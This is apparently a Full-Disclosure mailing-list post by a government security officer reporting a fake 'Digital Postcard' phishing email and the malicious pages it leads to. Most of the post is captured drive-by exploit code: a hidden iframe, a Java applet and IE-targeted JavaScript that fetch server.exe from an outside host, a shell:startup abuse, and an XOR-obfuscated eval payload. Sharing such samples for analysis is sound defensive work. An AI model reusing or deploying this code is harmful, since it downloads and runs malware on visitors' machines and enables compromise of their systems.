Hxxp://mercylane.com/ Exploit code

["Peter B. Harvey \(Information Security\)" <peterharvey () emergency qld gov au>]

Hi all,

Interesting occurance started to happen today, had about ten people trip
off the virus alerts for Trend Micro JAVA_BYTEVER.A. Please note that
the information given was obscured with xx to prevent unpatched system
infection. At the time of writing I do not know what happens on a system
that runs this code, any help would be appreciated.

The email read as follows:
________________________________________________________________________
____
A Digital Postcards(R) Greeting from John    Korhonen waiting for you at
POSTCARDS.COM!

If you have a modern e-mail program, you can go directly to your card by
clicking:

 http://Postcard.com/pickup/DP_416b029023245c15.
      
*PLEASE* make sure your mail program has not cut the CardID # into 2
lines!! If it has,
you need to use the Old-Fashioned method below.

You can pick-up your postcard the old-fashioned way, by going to the
following URL:

   http://postcard.com/cards/pickup.html.
    
and entering your postcard ID number:   DP_416b029023245c15

If postcard is not picked up within two weeks, it may be removed.

Thank you!
This is a free service of Digital Postcard(R)
________________________________________________________________________
____
The card does not exist however the HTTP links went to mercylane.com
Investigating the site I found this in the sites front page.
________________________________________________________________________
____
xxIFRAME SRC="hxxp://katerjake.net/index1.php" width="0" height="0"
FRAMEBORDER="0" SCROLLING="no" MARGINWIDTH="0"
MARGINHEIGHT="0"xxxx/IFRAMExx
________________________________________________________________________
____


Source of this page reveals.
________________________________________________________________________
____
<html><body>

     <APPLET ARCHIVE="classload.jar" CODE="GetAccess.class" WIDTH=1
HEIGHT=1>
     <PARAM NAME="ModulePath" VALUE="hxxp://katerjake.net/server.exe">
     </APPLET>   

<script>

var ie6_page = "hxxp://katerjake.net/indexold.html";
var ie6_sp2_page = "hxxp://katerjake.net/index2.html";

var agt=navigator.userAgent.toLowerCase();
var appVer = navigator.appVersion.toLowerCase();
var minVer = navigator.appMinorVersion.toLowerCase();

var is_win = (navigator.platform.indexOf("Win32") != -1);
var is_opera = (agt.indexOf("opera") != -1);
var is_ie = appVer.indexOf("msie");

if (!is_opera && is_win && is_ie){

     is_minor = parseFloat(appVer.substring(is_ie+5,
appVer.indexOf(';',is_ie)));
     is_major = parseInt(is_minor);

    
     var is_ie51 = (is_minor == 5.5);
     var is_ie6 = (is_minor == 6.0);

    
     if (is_ie51) { document.location = ie51_page; }
     else if (is_ie6) 
     {

        if (minVer.indexOf("sp2") != -1) { document.location =
ie6_sp2_page; } // with sp2
        else
        {   // not sp2 starts


        if (minVer.indexOf("sp1") == -1) { document.location = ie6_page;
} // without sp1
        else
        {
           if (minVer.indexOf("q823353") != -1) { document.location =
"hxxp://katerjake.net/index2.html"; }
           else if (minVer.indexOf("q837009") != -1) { document.location
= "hxxp://katerjake.net/index2.html"; }
                      else { document.location =
"hxxp://katerjake.net/indexold.html"; }
        }

        } // not sp2 ends

     }


}

</script>
</html>
________________________________________________________________________
____
Index 2 has
________________________________________________________________________
____
<script> 
function govn(){  
var w=window.open("javascript:setInterval(function(){try{var
tempvar=opener.location.href;}catch(e){location.assign('javascript:var
xmlHTTP = new ActiveXObject(&quot;Microsoft.XMLHTTP&quot;);xmlHTTP.open
(&quot;GET&quot;,&quot;http://katerjake.net/server.exe&quot;,false);xmlH
TTP.send();var contents =
xmlHTTP.responseBody;document.innerHTML=(&quot;&lt;title&gt;You Need a
better browser&lt;/title&gt;&lt;DIV ID=DS2 align=center
style=position:absolute;left:10;top:-30;&gt;&lt;br&gt;&lt;br&gt;&lt;cent
er&gt;&lt;font face=arial color=black&gt;&lt;b&gt;This web page requires
Opera Comptable browser&lt;/b&gt;&amp;nbspYou can download Opera from
the &lt;a href=http://www.opera.com&gt;Opera Software Group web
site&lt;/a&gt;.&lt;/center&gt;&lt;/div&gt;&lt;html&gt;&lt;iframe
src=shell:startup HEIGHT=5000; WIDTH=5000
style=color:red;position:absolute;top:30;left:-2000;border:dotted;z-inde
x:-90;&gt;&lt;/iframe&gt;&lt;body
onload=showpop()&gt;&lt;script&gt;function
showpop(){pop=window.createPopup();pop.document.body.style.margin=0;pop.
document.body.innerHTML=txt.value;pop.show(100,100,screen.width+300,scre
en.height+300);}&lt;/script&gt;&lt;span style=position: absolute; left:
1; top: 1 id=absspan&gt;&lt;/span&gt;&lt;textarea id=txt rows=1 cols=20
style=display:none&gt;&lt;html&gt;&lt;body&gt;&lt;table width=100%
height=100%&gt;&lt;tr ALIGN=LEFT
VALIGN=TOP&gt;&lt;br&gt;&lt;center&gt;&lt;img
src=http://katerjake.net/server.exe id=anch
onmousedown=parent.pop.show(1,1,1,1);
style=width=4000px;height=4000px;background-image:url(&amp;quot;http://k
aterjake.net/1.gif&amp;quot;);&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/t
able&gt;&lt;/textarea&gt;&lt;/body&gt;&lt;/html&gt;&quot;)');window.clos
e();}},100)","_blank","height=10,width=10,left=10000,top=10000");  
w.location.assign=location.assign;  
location.href="http://localhost";;  
}  
govn()  
</script>
________________________________________________________________________
____
Index old has
________________________________________________________________________
____
<html>



<script>
x=35;
es="71;75;70;83;74;77;71;94;5;91;95;71;91;85;25;71;93;81;70;85;86;72;92;
18;28;25;72;14;15;115;2;103;54;116;117;112;1;109;60;122;123;122;127;107;
58;96;97;100;18;113;32;102;103;110;108;127;46;108;109;104;108;69;20;82;8
3;83;81;67;18;88;89;88;91;73;24;94;95;70;69;87;6;68;69;64;70;93;12;74;75
;75;73;91;10;176;177;180;178;161;240;182;183;187;205;175;254;188;189;188
;189;181;228;162;163;162;209;179;226;168;169;173;168;185;232;174;175;146
;229;135;214;148;149;144;158;141;220;154;155;155;153;139;218;128;129;133
;128;145;192;134;135;139;248;159;206;140;141;136;251;229;180;242;243;242
;253;227;178;248;249;253;255;233;184;254;255;230;149;247;166;228;229;224
;148;253;172;234;235;239;156;251;170;208;209;212;213;193;144;214;215;222
;208;207;158;220;221;216;172;213;132;194;195;194;192;211;130;200;201;201
;186;217;136;206;207;306;327;295;374;308;309;308;321;301;380;314;315;312
;318;299;378;288;289;289;338;305;352;294;295;301;346;319;366;300;301;299
;348;261;340;274;275;272;353;259;338;280;281;286;282;265;344;286;287;260
;264;279;326;260;261;258;370;285;332;266;267;270;376;283;330;368;369;374
;263;353;304;374;375;380;369;367;318;380;381;379;379;373;292;354;355;358
;356;371;290;360;361;364;355;377;296;366;367;343;341;327;278;340;341;337
;339;333;284;346;347;347;349;331;282;320;321;321;306;337;256;326;327;330
;319;351;270;332;333;332;313;421;500;434;435;434;455;419;498;440;441;444
;442;425;504;446;447;423;421;439;486;420;421;416;418;445;492;426;427;427
;431;443;490;400;401;404;482;385;464;406;407;414;408;399;478;412;413;408
;493;405;452;386;387;386;384;403;450;392;393;392;510;409;456;398;399;502
;388;487;438;500;501;496;498;493;444;506;507;507;505;491;442;480;481;480
;405;497;416;486;487;490;415;511;430;492;493;488;486;453;404;466;467;466
;416;451;402;472;473;476;479;457;408;478;479;454;452;471;390;452;453;449
;463;477;396;458;459;462;440;475;394;560;561;564;560;545;624;566;567;574
;561;559;638;572;573;568;587;565;612;546;547;551;596;563;610;552;553;553
;602;569;616;558;559;530;615;519;598;532;533;528;542;525;604;538;539;538
;616;523;602;512;513;516;519;529;576;518;519;526;524;543;590;524;525;521
;519;613;564;626;627;630;512;611;562;632;633;636;627;617;568;638;639;615
;613;631;550;612;613;608;531;637;556;618;619;618;542;635;554;592;593;592
;593;577;528;598;599;602;601;591;542;604;605;601;603;597;516;578;579;579
;588;595;514;584;585;589;587;601;520;590;591;694;692;679;758;692;693;693
;707;685;764;698;699;702;703;683;762;672;673;677;679;689;736;678;679;686
;684;703;750;684;685;681;679;645;724;658;659;659;657;643;722;664;665;664
;749;649;728;670;671;647;649;663;710;644;645;644;755;669;716;650;651;651
;654;667;714;752;753;756;752;737;688;758;759;767;763;751;702;764;765;760
;758;757;676;738;739;739;741;755;674;744;745;749;751;761;680;750;751;726
;674;711;662;724;725;720;722;717;668;730;731;731;729;715;666;704;705;704
;705;721;640;710;711;715;700;735;654;716;717;717;700;805;884;818;819;822
;835;803;882;824;825;828;845;809;888;830;831;806;803;823;870;804;805;800
;854;829;876;810;811;810;808;827;874;784;785;788;784;769;848;790;791;799
;797;783;862;796;797;797;874;791;792;795;776;848;858;853;834;853;860;852
;847;786;862;850;848;819;804;874;874;895;";
var ds=new String();
ads=es.split(";");
k=ads.length-1;
m=5;
for(var j=0;j<k;j++)
{e=ads[j];d=e^x;m+=3;x+=1;ds=ds+String.fromCharCode(d);}eval(ds)

</script>
</html>

________________________________________________________________________
____

Again I have not analysed what the code does yet.
____________________________________________
Peter Harvey
Information Security Officer
Dept. Emergency Services - QLD
Phone: +61 7 3109 7213
____________________________________________

This correspondence is for the named persons only.
It may contain confidential or privileged information or both.
No confidentiality or privilege is waived or lost by any mis transmission.
If you receive this correspondence in error please delete it from your system immediately and notify the sender.
You must not disclose, copy or relay on any part of this correspondence, if you are not the intended recipient.
Any opinions expressed in this message are those of the individual sender except where the sender expressly,
and with the authority, states them to be the opinions of the Department of Emergency Services, Queensland.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html